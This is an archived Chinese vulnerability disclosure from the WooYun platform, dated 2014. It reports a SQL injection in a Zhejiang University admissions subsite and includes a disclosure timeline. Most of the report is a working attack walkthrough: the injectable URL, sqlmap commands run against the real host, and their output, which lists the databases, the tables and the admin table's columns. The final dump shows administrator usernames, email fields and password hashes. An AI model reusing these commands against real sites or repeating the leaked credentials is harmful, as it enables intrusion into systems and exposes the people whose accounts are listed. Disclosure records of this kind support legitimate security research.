乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-10: 细节已通知厂商并且等待厂商处理中 2014-05-15: 厂商已经确认,细节仅向厂商公开 2014-05-25: 细节向核心白帽子及相关领域专家公开 2014-06-04: 细节向普通白帽子公开 2014-06-14: 细节向实习白帽子公开 2014-06-24: 细节向公众公开
浙江大学某分站&MySQL注入导致数据库大量重要信息泄露涉及大量数据库信息!
浙江大学本科招生网:http://zdzsc.zju.edu.cn/MySQL注入地址:
http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2
SQLMAP- -.#1、获取数据库
./sqlmap.py -u "http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2" --dbs
available databases [5]:[*] d001[*] information_schema[*] mysql[*] test[*] zdzsc
#2、获取数据库中的表:
./sqlmap.py -u "http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2" -D zdzsc --tables
[34 tables]+-----------------+| ad || admin || admin_panel || admin_role || admin_role_priv || category || category_priv || footer || index_swf || link || linktype || log || member || menu || model || mycounter || news || news_data || oa_co || oa_dept || oa_duty || oa_insidemsg || oa_log || online || online_type || page || product || session || site || site_setting || sys_user || times || type || unit |+-----------------+
#3、猜解字段:
./sqlmap.py -u "http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2" -D zdzsc -T admin --columns
[10 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| card | varchar(255) || email | varchar(40) || encrypt | varchar(6) || lastloginip | varchar(15) || lastlogintime | int(10) unsigned || password | varchar(32) || realname | varchar(50) || roleid | smallint(5) || userid | mediumint(6) unsigned || username | varchar(20) |+---------------+-----------------------+
#4、猜解内容:
./sqlmap.py -u "http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2" -D zdzsc -T admin -C userid,username,password,email --dump
[4 entries]+--------+----------------------+-----------+----------------------------------+| userid | email | username | password |+--------+----------------------+-----------+----------------------------------+| 1 | [email protected] | phpcms | 82b982ec0349589a64ef6c09694f8e44 || 1809 | [email protected] | jinru | 3adfb51828a29b133a11a82a339ff0bf || 1810 | [email protected] | zhuyq1021 | cb0641120d0c16f2e93d1afc81bf4485 || 1811 | [email protected] | zju | 43563d7db0af79884c160e88c965bd04 |+--------+----------------------+-----------+----------------------------------+
还有很多很多,安全测试,就不亮出来了- -.
:)
危害等级:中
漏洞Rank:6
确认时间:2014-05-15 15:37
已通知相关学校处理
暂无